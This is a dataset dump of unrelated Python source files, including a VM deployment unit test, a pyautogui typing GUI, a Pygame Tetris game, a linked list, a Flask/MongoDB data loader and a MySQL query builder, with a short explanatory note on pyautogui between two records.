\"\"},\n {\"name\": \"PublicIP\", \"value\": \"\"},\n {\"name\": \"User\", \"value\": \"\"},\n ],\n },\n \"deploymentService\": {\n \"cloudProviderName\": \"Azure2Goldcode\",\n \"name\": \"Microsoft Azure 2nd Gen.Azure VM From Marketplace 2nd Gen\",\n \"model\": MyDeployedApp.DEPLOYMENT_PATH,\n \"driver\": 
None,\n \"attributes\": [\n {\n \"name\": \"MicrosoftAzure2G.AzureVMFromMarketplace2G.Disk\",\n \"value\": \"HDD\",\n },\n ],\n },\n }\n ),\n deployed_app_json=json.dumps(\n {\n \"name\": app_name,\n \"family\": \"Generic App Family\",\n \"model\": \"Generic App Model\",\n \"address\": address,\n \"attributes\": [\n {\"name\": \"Password\", \"value\": \"3M3u7nkDzxWb0aJ/IZYeWw==\"},\n {\"name\": \"User\", \"value\": \"adminuser\"},\n {\"name\": \"Public IP\", \"value\": \"\"},\n ],\n \"vmdetails\": {\n \"id\": \"4da74d28-50d9-4271-b2e4-b49eed1bb0fe\",\n \"cloudProviderId\": \"129b8fac-fd8d-4c37-bb1a-fdceba2f38d7\",\n \"uid\": uuid,\n \"vmCustomParams\": [],\n },\n }\n ),\n )\n resource = ResourceContextDetails(\n id=\"0917eb75-92ad-4291-9623-4235c81be76b\",\n name=app_name,\n fullname=app_name,\n type=\"Resource\",\n address=address,\n model=\"Generic App Model\",\n family=\"Generic App Family\",\n description=None,\n attributes={\n \"Password\": \"3M3u7nkDzxWb0aJ/IZYeWw==\",\n \"User\": \"adminuser\",\n \"Public IP\": \"\",\n },\n app_context=app_context,\n networks_info=None,\n shell_standard=None,\n shell_standard_version=None,\n )\n\n DeployedVMActions.register_deployment_path(MyDeployedApp)\n actions = DeployedVMActions.from_remote_resource(resource, Mock())\n\n app = actions.deployed_app\n assert isinstance(app, MyDeployedApp)\n assert app.name == app_name\n assert app.model == deployed_model\n assert app.deployment_service_model == MyDeployedApp.DEPLOYMENT_PATH\n assert app.private_ip == address\n assert app.vmdetails.uid == uuid\n assert app.attributes[f\"{MyDeployedApp.DEPLOYMENT_PATH}.Disk\"] == \"HDD\"\n assert app.attributes[\"User\"] == \"adminuser\"\n","sub_path":"tests/cp/core/request_actions/test_deployed_vm.py","file_name":"test_deployed_vm.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"391404216","text":"#-------------------------------------------------------------------------------\r\n# Name: gui_typex\r\n# Purpose:provide user interface for Text to voice announce with text to typing program\r\n#\r\n# Author: Khairul Basar\r\n#\r\n# Created: 07-03-2018\r\n# Copyright: (c) 20053478 2018\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\n'''step==1==\r\n#-------------------------------------------------------------------------------\r\n\r\nimport tkinter module and create a base window\r\n\r\n\r\n\r\nfrom tkinter import *\r\nwindow = Tk()\r\nwindow.title(\"Gui for Docx2txt\")\r\nwindow.mainloop()\r\n\r\n\r\n'''\r\n\r\nimport os\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport tkinter as tk\r\n# import docx2txtv3\r\nfrom docx import Document\r\nimport ntpath\r\nimport shutil\r\n\r\n#=======for text to type & text to voice\r\nimport pyautogui\r\nimport time\r\nimport winsound\r\nimport pyttsx3\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"520x200\")\r\nwindow.title(\"Gui for Typex\")\r\n\r\ncwd = os.getcwd()\r\n\r\nsw_lbl = Label(window, text=\"Use Typex to type text files in your text field\", font=(\"Arial\", 12))\r\nsw_lbl.grid(column=0, row=0, columnspan=3)\r\n\r\nlabel_docx_path = Label(window, text=\"Textfile dir: \", font=(\"Arial\", 12))\r\nlabel_docx_path.grid(column=0, row=1, sticky=\"W\")\r\n\r\nsource_path_txt_var = tk.StringVar()\r\nsource_path_txt = tk.Entry(window, width=50)\r\nsource_path_txt.grid(column=1, row=1, sticky=\"W\")\r\nsource_path_txt.insert(END, cwd)\r\nlabel_txt_path = Label(window, text=\"Delay time(s): \", font=(\"Arial\", 12))\r\nlabel_txt_path.grid(column=0, row=2, sticky=\"W\")\r\n\r\n# delay for typing\r\ndest_path_txt_var = tk.StringVar()\r\ndest_path_txt = tk.Entry(window, width=10)\r\ndest_path_txt.grid(column=1, row=2, sticky=\"W\")\r\ndest_path_txt.insert(END, 45)\r\n\r\n\r\n# rate of typing Label\r\nrate_label_txt = Label(window, text=\"Rate of type: \", font=(\"Arial\", 12))\r\nrate_label_txt.grid(column=1, row=2, sticky=\"N\")\r\n\r\n# rate of typing\r\nrate_type_txt_var = tk.StringVar()\r\nrate_type_txt = tk.Entry(window, width=10)\r\nrate_type_txt.grid(column=1, row=2, sticky=\"E\")\r\nrate_type_txt.insert(END, 0.01)\r\n\r\n\r\ndef clicked_browse_source():\r\n dir = filedialog.askdirectory()\r\n source_path_txt.delete(0, END)\r\n source_path_txt.insert(0, dir)\r\n return\r\n\r\n# Clicked browsed destination folder button\r\n\r\n\r\n'''\r\ndef clicked_browse_dest():\r\n\tdir = filedialog.askdirectory()\r\n\tdest_path_txt.delete(0, END)\r\n\tdest_path_txt.insert(0, dir)\r\n\treturn\r\n'''\r\n\r\n\r\ndef say(s):\r\n engine = pyttsx3.init()\r\n rate = engine.getProperty('rate')\r\n engine.setProperty('rate', rate)\r\n voices = engine.getProperty('voices')\r\n # for voice in voices:\r\n engine.setProperty('voice', 'english-us')\r\n # print voice.id\r\n engine.say(s)\r\n a = engine.runAndWait() # blocks\r\n\r\n\r\ndef typex(dir, delaytime, interval):\r\n for filename in os.listdir(dir):\r\n fx = os.path.abspath(filename)\r\n say('Starting to type file ' + filename)\r\n say('filename: ' + filename)\r\n say('I repeat, filename: ' + filename)\r\n say('Waiting ' + str(round(delaytime, 2)) + 'seconds before starting')\r\n # print(fx)\r\n d1 = delaytime / 3.0 # 1/3rd div of whole wait time\r\n # 2xd1=2/3rd of whole time, 3xd1=whole time\r\n time.sleep(d1)\r\n say('Waiting ' + str(round(2 * d1, 2)) + 'seconds before starting')\r\n time.sleep(d1)\r\n 
say('Waiting ' + str(round(d1, 2)) + ' seconds before starting')\r\n time.sleep(d1)\r\n with open(dir + \"\\\\\" + filename, \"r\") as fxo:\r\n # print(fxo.read())\r\n for line in fxo:\r\n pyautogui.typewrite(line, interval)\r\n\r\n winsound.PlaySound(\"SystemExit\", winsound.SND_ALIAS)\r\n say('Finished typing file: ' + filename)\r\n say('Waiting for ' + str(delaytime / 2.0) + ' seconds')\r\n time.sleep(delaytime / 2.0)\r\n\r\n\r\nbtn_browse_source = Button(window, text=\"...file dir\", bg=\"gray\", fg=\"yellow\", command=clicked_browse_source)\r\nbtn_browse_source.grid(column=2, row=1, sticky=\"W\")\r\n\r\n'''\r\nbtn_browse_dest = Button(window, text=\"...text dir\", bg=\"gray\", fg=\"blue\", command=clicked_browse_dest)\r\nbtn_browse_dest.grid(column=2, row=2)\r\n'''\r\n\r\nmgs_txt = Label(window, text=\"Welcome! Typex is used to type existing text\" + \"\\n\" + \" from a text file into the active text field\", font=(\"Arial\", 12))\r\nmgs_txt.grid(column=0, row=5, columnspan=3, sticky=\"N\")\r\n\r\n\r\ndef clicked_btn_convert():\r\n oks = 0\r\n okd = 0\r\n rate = 0\r\n if os.path.isdir(source_path_txt.get()):\r\n mgs_txt.configure(text=\"Source path for text files: OK!\")\r\n oks = 1\r\n else:\r\n mgs_txt.configure(text=\"Error! Source text path is invalid.\")\r\n\r\n if oks == 1:\r\n try:\r\n delay = float(dest_path_txt.get())\r\n # rate or interval between typing two chars\r\n rate = float(rate_type_txt.get())\r\n mgs_txt.configure(text=\"Program started...\")\r\n if top_is_checked.get():\r\n window.attributes('-topmost', True)\r\n else:\r\n window.attributes('-topmost', True)\r\n window.update()\r\n window.attributes('-topmost', False)\r\n\r\n oks = 2\r\n except:\r\n mgs_txt.configure(text=\"Error: Invalid time delay!\")\r\n oks = 0\r\n\r\n if oks == 2:\r\n typex(os.path.abspath(source_path_txt.get()), delay, rate)\r\n\r\n\r\nbtn_convert = Button(window, text=\"Click to start\", bg=\"orange\", fg=\"blue\", command=clicked_btn_convert)\r\nbtn_convert.grid(column=1, row=4)\r\n\r\ntop_is_checked = IntVar()\r\ncheck = Checkbutton(window, text=\"Always on top\", onvalue=1, offvalue=0, variable=top_is_checked)\r\ncheck.grid(column=0,row=4, sticky='W')\r\n\r\n\r\nbtn_exit = Button(window, text=\"Exit\", bg=\"light gray\", fg=\"blue\", width=10, command=window.destroy)\r\nbtn_exit.grid(column=2, row=6, sticky='W')\r\n\r\n\r\n\r\ndef main():\r\n window.mainloop()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"gui_typex.py","file_name":"gui_typex.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
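The single call typex() is built around, shown in isolation: pyautogui.typewrite replays a string keystroke by keystroke, paced by its interval argument. The sleep gives you time to focus the target text field, mirroring the countdown the GUI speaks.

import time

import pyautogui

time.sleep(3)  # click into the destination text field during this pause
pyautogui.typewrite("hello from typex\n", interval=0.01)  # ~10 ms between keys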
+{"seq_id":"604298082","text":"import pygame\r\nfrom settings import Settings\r\nfrom shape_formats import Shapes\r\nimport game_functions as gf\r\n\r\ndef main():\r\n pygame.init()# Инициализация pygame\r\n game_sett = Settings()# Обьект настроек\r\n screen = pygame.display.set_mode((game_sett.W, game_sett.H))# Экран\r\n pygame.display.set_caption('Tetris')# Заголовок окна\r\n screen.fill(game_sett.bg_color)# Фон экрана\r\n pygame.display.update()# Обновление экрана\r\n clock = pygame.time.Clock()# Переменная времени\r\n\r\n score = 0# Перменная отбражения очков\r\n\r\n locked_pos = {}# Словарь свободных позиций в сетке\r\n grid = gf.create_grid(game_sett.bg_color, locked_pos)# Сетка\r\n\r\n sh = Shapes()\r\n shapes = sh.get_shapes_list()# Список фигур\r\n shape_colors = sh.get_colors_list(game_sett)# Список цветов\r\n \r\n current_shape = gf.get_shape(shapes, shape_colors)# Тек.фигура\r\n next_shape = gf.get_shape(shapes, shape_colors)# След.фигура\r\n\r\n while True:\r\n grid = gf.create_grid(game_sett.bg_color, locked_pos)# Сетка\r\n\r\n # Анимация падения фигур\r\n gf.falling_animation(current_shape, clock, grid, game_sett)\r\n\r\n # Обработка событий клавиатуры\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:# Влево\r\n current_shape.x -= 1\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.x += 1\r\n elif event.key == pygame.K_RIGHT:# Вправо\r\n current_shape.x += 1\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.x -= 1\r\n elif event.key == pygame.K_UP:# Поворот фигуры\r\n current_shape.rotation = current_shape.rotation - 1 % len(current_shape.shape)\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.rotation = current_shape.rotation - 1 % len(current_shape.shape)\r\n elif event.key == pygame.K_DOWN:# Ускорение вниз\r\n current_shape.y += 1\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.y -= 1\r\n \r\n # Добавление цвета фигуры в сетку для отрисовки\r\n shape_pos = gf.convert_shapes(current_shape)\r\n for x, y in shape_pos:\r\n if y > -1:\r\n grid[y][x] = current_shape.color\r\n\r\n # Если фигура приземлилась на дно\r\n if game_sett.change_piece:\r\n for x, y in shape_pos:\r\n locked_pos[(x, y)] = current_shape.color\r\n current_shape = next_shape\r\n next_shape = gf.get_shape(shapes, shape_colors)\r\n game_sett.change_piece = False\r\n\r\n # Очистка заполненных линий\r\n score += gf.clearing_rows(grid, locked_pos, game_sett)*10\r\n \r\n\r\n # Отрисовка экрана, сетки, след. фигуры\r\n gf.draw_window(screen, game_sett, grid, next_shape)\r\n\r\n # Проверка конца игы\r\n if gf.check_lost(locked_pos):\r\n gf.end_game(screen, score, game_sett)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"69378125","text":"\"\"\"\nGiven a string in Python. The task is to check whether the string has at least one letter(character) and one number.\nReturn “True” if the given string full fill above condition else return “False” (without quotes).\nExamples:\n\nInput: welcome2ourcountry34\nOutput: True\n\nInput: stringwithoutnum\nOutput: False\n\"\"\"\n\n\ndef is_anumber_aletter_exist(text: str) -> bool:\n number_flag = False\n letter_flag = False\n\n for char in text:\n if char.isdigit():\n number_flag = True\n\n if char.isalpha():\n letter_flag = True\n\n return number_flag and letter_flag\n","sub_path":"geeksforgeeks/strings/ex8.py","file_name":"ex8.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"520037843","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/pyjon/events/dispatcher.py\n# Compiled at: 2014-10-06 09:13:36\n\"\"\"a basic event dispatcher mechanism\n\"\"\"\nimport logging\nlogger = logging.getLogger('EventDispatcher')\n\nclass EventDispatcher(type):\n \"\"\"An event dispatcher\n \"\"\"\n\n def __init__(cls, name, bases, newattrs):\n \"\"\" Magic needed to create a class with EventDispatcher methods,\n and an empty callbacks property \"\"\"\n super(EventDispatcher, cls).__init__(name, bases, newattrs)\n cls.emit_event = EventDispatcher.emit_event\n for key, value in EventDispatcher.__dict__.items():\n if not key.startswith('__'):\n setattr(cls, key, value)\n\n def test_callbacks_dict(self):\n if not hasattr(self, 'callbacks'):\n self.callbacks = dict()\n\n def add_listener(self, name, callback, *args, **kwargs):\n \"\"\"Adds an event listener on the instance.\n \n :param name: event name to listen for\n :type name: unicode or str\n\n :param callback: the callable to fire when the event is emitted\n :type callback: callable\n \n Additionnal args and kwargs are passed to the callback when the event\n is fired\n \n If you want to stop the callback chain, your callback should\n return False. All other return values are discarded.\n \"\"\"\n self.test_callbacks_dict()\n d = dict(callback=callback, args=args, kwargs=kwargs)\n self.callbacks.setdefault(name, []).append(d)\n\n def remove_listener(self, name, func):\n \"\"\"\n Removes a callback from the callback list for the given\n event name.\n\n :param name: event name to listen for\n :type name: unicode or str\n \n :param func: the function of the callback to unregister\n :type func: method\n \"\"\"\n self.test_callbacks_dict()\n if self.callbacks.has_key(name):\n callbacks = self.callbacks[name]\n [ callbacks.remove(callback) for callback in callbacks if callback['callback'] == func ]\n\n def emit_event(self, name, *args, **kwargs):\n \"\"\"\n Emit a named event. This will fire all the callbacks registered\n for the named event.\n\n :param name: event name to listen for\n :type name: unicode or str\n\n Additionnal args and kwargs are passed to the callbacks (before the one that were passed to add_listener)\n \"\"\"\n logger.debug('%s: calling %s with %s and %s' % (repr(self), name,\n repr(args), repr(kwargs)))\n self.test_callbacks_dict()\n for cbdict in self.callbacks.get(name, list()):\n handler = cbdict.get('callback')\n listener_args = cbdict.get('args')\n listener_kwargs = cbdict.get('kwargs')\n myargs = list(args)\n myargs.extend(listener_args)\n mykwargs = kwargs\n mykwargs.update(listener_kwargs)\n result = handler(*myargs, **mykwargs)\n if result is False:\n break","sub_path":"pycfiles/pyjon.events-1.2-py2.7/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"256536435","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 13 10:42:38 2018\r\n\r\n@author: ukn1hc\r\n\"\"\"\r\n\r\nimport sys\r\n\r\nfilepath = sys.argv[1]\r\nbyteoder = sys.argv[2] # 'm' = msb or 'i' = intel\r\n\r\n\r\n# Load file Excel input\r\nfrom openpyxl import load_workbook\r\nwb = load_workbook(filename = filepath)\r\nsheet_ranges = wb['Sheet1'] # grab the active worksheet\r\n\r\n\r\n# Prepare the excel output\r\nfrom openpyxl import Workbook\r\nwb1 = Workbook()\r\nws = wb1.active # grab the active worksheet\r\n\r\nexcel_title=['ID',\r\n \"Frame Name\",\r\n \"Cycle Time [ms]\",\r\n \"Launch Type\",\r\n \"Launch Parameter\",\r\n \"Signal Byte No.\",\r\n \"Signal Bit No.\",\r\n \"Signal Name\",\r\n \"Signal Function\",\r\n \"Signal Length [Bit]\",\r\n \"Signal Default\",\r\n \"Signal Not Available\",\r\n \"Byteorder\",\r\n \"Nodes\",\r\n \"Vector__XXX\",\r\n \"Value\",\r\n \"Name / Phys. Range\",\r\n \"Function / Increment Unit\"]\r\n\r\n# Add title row\r\nfor i in range(0,len(excel_title)):\r\n ws.cell(row = 1, column = i+1, value = excel_title[i])\r\n \r\n\r\n\r\nwb1.save(\"excel2dbc_{}\".format(filepath))\r\n\r\n","sub_path":"Scan_input.py","file_name":"Scan_input.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"616084504","text":"from SinglyLinkedNode import SinglyLinkedNode\n\n\nclass SinglyLinkedList:\n\n def __init__(self):\n self._first=None\n self._last=None\n self._size=0\n\n\n\n def __len__(self):\n return self._size\n\n\n def isEmpty(self):\n return self._size==0\n\n def append(self, element):\n newNode = SinglyLinkedNode(element, None)\n if self._last == None:\n self._first = self._last = newNode\n else:\n self._last.next = newNode\n self._last = newNode\n self._size += 1\n\n\n\n\n\n def remove(self,k):\n if not 0\",end=\"\")\n node=node.next\n else:\n print(node.element)\n\n\n\ndef main():\n list=SinglyLinkedList()\n for i in range(5):\n list.append(int(input(\"enter a number\")))\n\n list.printList()\n\n\n\n\n","sub_path":"secondProject/singlyLinkedList.py","file_name":"singlyLinkedList.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"330350074","text":"#!/usr/bin/env python\n'''\nLoads Raw data into Mongo Database\n'''\n\nfrom flask import Flask\nfrom datetime import datetime\nimport traceback\nimport configparser\nimport sys\nfrom bson.json_util import loads\nfrom bson.json_util import dumps\nfrom pymongo import MongoClient\nimport os.path\nfrom io import StringIO\n\n\ndef displayCatalog(catalog):\n fp = StringIO()\n fp.write(\"\")\n fp.write(\"Number Name Uom Min Max Type \")\n for doc in catalog.find().sort('_id'):\n fp.write(\"%s %s %s %s %s %s \" % \\\n (doc['_id'],doc['name'],doc['uom'],doc['min'],doc['max'],doc['type']))\n fp.write(\"
\")\n return fp.getvalue()\n\ndef readCatalog(catalog,key):\n '''\n Reads entryies from paramter catalog\n '''\n try:\n entry = catalog.find_one({'_id': key})\n print(entry)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n print('%s %s' % (exc_type,exc_value))\n traceback.print_tb(exc_traceback)\n\ndef errorLog(errors,src,msg):\n obj = {}\n obj['date'] = datetime.now()\n obj['source'] = src\n obj['msg'] = msg\n errors.insert_one(obj)\n\ndef loadRawData(catmap,raw,errors,data):\n ''' \n Data loading procedure\n '''\n try:\n obj = {}\n tok = data.split(';')\n now = datetime.now()\n obj['_id'] = '%s_%s' % (tok[0],now.strftime('%Y%m%d-%H%M%S.%f'))\n obj['loaddate'] = datetime.now()\n obj['meter'] = tok[0]\n obj['testdate'] = datetime.strptime(tok[1],'%Y%m%d%H%M%S') \n tok.pop(0)\n tok.pop(0)\n for item in tok:\n if item[:3] in catmap:\n catitem = catmap[item[:3]]\n name = item[:3] #catitem['name']\n value = item[3:]\n # Convert?\n if (catitem['type'] == 'F'):\n obj[name] = float(value)\n else:\n obj[name] = value\n else:\n errorLog(errors,data,'Unknown parameter %s' % item[:3])\n\n raw.insert(obj)\n print('Updated db')\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n errorLog(errors,data,'%s %s' % (exc_type,exc_value))\n traceback.print_tb(exc_traceback)\n raise\n\n\n\n# Config File\nfp = '/usr/local/etc/config.ini'\nif not os.path.isfile(fp):\n print(\"Can't find config file: %s\" % fp)\n sys.exit(1)\n\nconfig = configparser.ConfigParser()\nconfig.read_file(open(fp))\n\nclient = MongoClient(config['mongo']['host'],int(config['mongo']['port']))\ndb = client.data\nraw = db.raw\nerrors = db.errors\n\n# Load catmap\ncatmap = {}\ncatalog = db.catalog\ncursor = catalog.find()\nfor doc in cursor:\n catmap[doc['_id']] = doc\n\n# Start Server\napp = Flask(__name__)\n\n@app.route('/')\ndef root():\n return('Hello')\n\n@app.route('/d/')\ndef data_input(data=None):\n if (data is None):\n return('Data not supplied\\n')\n else:\n try:\n loadRawData(catmap,raw,errors,data)\n return('Loaded data...\\n')\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n print('%s %s' % (exc_type,exc_value))\n return('Error Loading Data: %s\\n' % traceback.print_tb(exc_traceback))\n\n@app.route('/catalog')\ndef cat():\n return(displayCatalog(catalog))\n","sub_path":"aqua-server.py","file_name":"aqua-server.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"225791765","text":"from django.utils.translation import ugettext_lazy as _\nErrorMsg = {\n 'phone': _(\"Please enter your phone number\"),\n 'zipcode': _(\"Please enter your zipcode\"),\n 'email': _(\"Please enter your email.\"),\n 'service': _(\"Please select a service.\"),\n 'city': _(\"Please let us know where you live.\"),\n 'name': _(\"Please enter your name.\"),\n 'comment': _(\"Please enter your question.\"),\n 'dateToBeDone': _(\"Please enter the date for cleaning.\"),\n}\n\n\ndef get_error_msg(field_name):\n return ErrorMsg.get(\n field_name,\n _('field %(field)s cannot be empty!') % {'field': field_name}\n )\n\nORDER_RECEIVED_MSG = _(\"Thank you! we have received your order.\")\nCONTACTED_MSG = _(\"Thank you! We have received your question and will get back to you shortly.\")\nINVALID_FORM_MSG = _(\"Please correct the form fields.\")\nSERVICE_ZIP_NOT_AVAILABLE = _(\"The service is not available in your area.\")\nSUBSCRIBED_MSG = _(\"Thank you for subscribing! We will inform you when we come to your city.\")\nREFERENCE_CODE_INVALID = _(\"Reference code is not valid! Please enter a valid code.\")\nREFERENCE_CODE_SUCCEED = _(\"Congratulations! Your voucher is activated. Please proceed with your booking.\")","sub_path":"utils/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"353359601","text":"# -*- Encoding: utf-8 -*-\nimport codecs\nimport MySQLdb\nimport MySQLdb.cursors\nimport time\nimport urllib\n\nimport attribute\n\nfrom ..utils import is_lex_mat\n\n\nmax_time = 60 * 5 # 5 minutes\n\n_parser = attribute.Parser()\n\ndef _quotetext(s):\n if not s:\n return \"\"\n return s.replace('&', '&').replace('<', '<').replace('>', '>')\n\ndef _quoteattr(s):\n return _quotetext(s).replace(\"'\", ''').replace('\"', '"').replace('\\n', '
').replace('\\r', '
').replace('\\t', ' ')\n\ndef ProduceCondition(tableName, fieldName, data):\n l = []\n\n for el in data:\n y = []\n\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"NOT \"\n e = e.replace(\"-\", \"\")\n y.append(u\"%sEXISTS(SELECT * FROM %s WHERE %s.id = words.%s AND %s.value = '%s')\" % (neg, tableName, tableName, fieldName, tableName, e))\n\n if y:\n l.append(\"(%s)\" % \" AND \".join(y))\n if l:\n return \"(%s)\" % \" OR \".join(l)\n\n return None\n\nclass Attributes:\n def __init__(self, cursor, tableName):\n self.cursor = cursor\n self.tableName = tableName\n\n def getId(self, val):\n self.cursor.execute(u\"SELECT id FROM %s WHERE value = '%s';\" % (self.tableName, val))\n res = self.cursor.fetchall()\n if len(res) > 0:\n return res[0][0]\n else:\n return None\n\n def getValue(self, n):\n self.cursor.execute(u\"SELECT value FROM %s WHERE id = %s;\" % (self.tableName, n))\n\n return [x[0] for x in self.cursor.fetchall()]\n\nclass Word:\n def __init__(self, query, n):\n place = n + 1\n self.n = n\n\n self.lex = query.get(\"lex%s\" % place, [\"\"])[0].lower()\n self.lexParsed = _parser.parse(self.lex)\n\n self.gramm = query.get(\"gramm%s\" % place, [\"\"])[0]\n self.grammParsed = _parser.parse(self.gramm)\n\n self.flags = query.get(\"flags%s\" % place, [\"\"])[0]\n self.flagsParsed = _parser.parse(self.flags)\n\n self.father = int(query.get(\"parent%s\" % place, [0])[0]) - 1\n\n self.linkExists = \"link%s\" % place in query and self.father >= 0\n\n self.link = query.get(\"type%s\" % place, [\"\"])[0].lower()\n self.linkParsed = _parser.parse(self.link)\n\n self.lfVal = int(query.get(\"parent%s\" % place, [0])[0]) - 1\n self.lfExists = \"lf%s\" % place in query and self.lfVal >= 0\n self.lfFunc = query.get(\"lf_func%s\" % place, [\"\"])[0]\n self.lfFuncParsed = _parser.parse(self.lfFunc)\n\n self.lfPrep = query.get(\"lf_prep%s\" % place, [\"\"])[0]\n self.lfPrepParsed = _parser.parse(self.lfPrep)\n\n self.lfTable = 'lf_%d' % self.n if self.lfPrep else 'lexical_functions'\n\n self.minDist = None\n self.maxDist = None\n\n self.level = None\n\n try:\n q = query.get(\"min%s\" % place, [\"\"])[0]\n if len(q) > 0:\n self.minDist = int(q)\n except:\n pass\n try:\n q = query.get(\"max%s\" % place, [\"\"])[0]\n if len(q) > 0:\n self.maxDist = int(q)\n except:\n pass\n\n if self.maxDist != None and self.minDist == None:\n self.minDist = 0\n\n if self.minDist != None and self.maxDist != None:\n x = [self.minDist, self.maxDist]\n self.minDist = min(x)\n self.maxDist = max(x)\n elif self.minDist != None:\n if self.minDist == 0:\n self.minDist = None\n elif self.minDist < 0:\n self.maxDist = self.minDist\n self.minDist = None\n\n try:\n q = query.get(\"level%s\" % place, [\"\"])[0]\n if len(q) > 0:\n self.level = int(q)\n except:\n pass\n\n # each SQL statement is of the form \"CREATE <...> SELECT <...>\"\n # so these two lists are in direct element-to-element correspondence\n self.create = []\n self.query = []\n\n def isWord(self):\n return len(self.lexParsed) > 0 or len(self.grammParsed) > 0 or len(self.flagsParsed) > 0\n\n def isRelated(self):\n return (self.father >= 0 or self.lfVal >= 0) \\\n and ((self.minDist != None and self.maxDist != None) or self.linkExists or self.lfExists)\n\n def empty(self):\n return not self.isWord() and not self.isRelated()\n\n def value(self):\n x = 0\n if self.empty():\n x = -1\n else:\n if self.isWord():\n if len(self.lex) > 0:\n x += 7\n if len(self.gramm) > 0:\n x += 4\n if len(self.flags) > 0:\n x += 4\n if self.isRelated():\n if self.linkExists:\n if 
len(self.link) > 0:\n x += 5\n else:\n x += 2\n if self.minDist != None or self.maxDist != None:\n x += 1\n return x\n\n def xml(self, full=False):\n x = []\n if full:\n x.append(u'n=\"%s\" value=\"%s\"' % (self.n, self.value()))\n if self.level != None:\n x.append(u'level=\"%s\"' % self.level)\n if self.minDist != None and self.maxDist != None:\n x.append(u'distance-min=\"%s\"' % self.minDist)\n x.append(u'distance-max=\"%s\"' % self.maxDist)\n elif self.minDist != None:\n x.append(u'distance-min=\"%s\"' % self.minDist)\n elif self.maxDist != None:\n x.append(u'distance-min=\"%s\"' % self.maxDist)\n\n if len(self.lex) > 0:\n x.append(u'lex=\"%s\"' % _quoteattr(self.lex))\n if len(self.gramm) > 0:\n x.append(u'gramm=\"%s\"' % _quoteattr(self.gramm))\n if self.flags > 0:\n x.append(u'flags=\"%s\"' % _quoteattr(self.flags))\n if full and self.father >= 0:\n x.append(u'father=\"%s\"' % self.father)\n if len(self.link) > 0:\n x.append(u'link=\"%s\"' % self.link)\n if len(self.lfFunc) > 0:\n x.append(u'lf_func=\"%s\"' % self.lfFunc)\n if full:\n if len(self.create) > 0:\n x.append(u'create=\"%s\"' % '; '.join([_quoteattr(create_clause) for create_clause in self.create]))\n if len(self.query) > 0:\n x.append(u'query=\"%s\"' % '; '.join([_quoteattr(query_clause) for query_clause in self.query]))\n return u' ' % \" \".join(x)\n\n def writeTraget(self, prevname, prevcolums, n, relation='syntax'):\n table_name = self.lfTable if relation == 'lexical_function' else 'words'\n from_element_name = 'father' if relation == 'syntax' else 'lf_val'\n x = None\n if n == self.n:\n x = \"%s.%s\" % (table_name, 'word')\n elif (self.linkExists and self.father == n) or (self.lfExists and self.lfVal == n):\n x = \"%s.%s\" % (table_name, from_element_name)\n elif n in prevcolums:\n x = \"%s.word%s\" % (prevname, n)\n return x\n\n def writeDist(self, prevname, prevcolums, dists, relation='syntax'):\n where = []\n rest = []\n for (son, father, minDist, maxDist) in dists:\n sonname = self.writeTraget(prevname, prevcolums, son, relation)\n fathername = self.writeTraget(prevname, prevcolums, father, relation)\n\n if sonname != None and fathername != None:\n if minDist != None and maxDist != None:\n where.append(u\"(%s - %s BETWEEN %s AND %s)\" % (sonname, fathername, minDist, maxDist))\n elif minDist != None:\n where.append(u\"(%s - %s >= %s)\" % (sonname, fathername, minDist))\n elif maxDist != None:\n where.append(u\"(%s - %s <= %s)\" % (sonname, fathername, maxDist))\n else:\n rest.append((son, father, minDist, maxDist))\n return (where, rest)\n\n def formLfPrepQuery(self):\n if not self.lfPrep:\n return ''\n query = 'SELECT lexical_functions.* from lexical_functions, words'\n\n feature_matching = [('document', 'document'), ('sentence', 'sentence'), ('word', 'lf_prep')]\n # adding parsed attribute conditions (which concern the word form only)\n l = []\n where = []\n for el in self.lfPrepParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e[1:]\n if e != None:\n y.append(u\"words.form %s= '%s'\" % (neg, e))\n if len(y) > 0:\n l.append(\" AND \".join(y))\n if 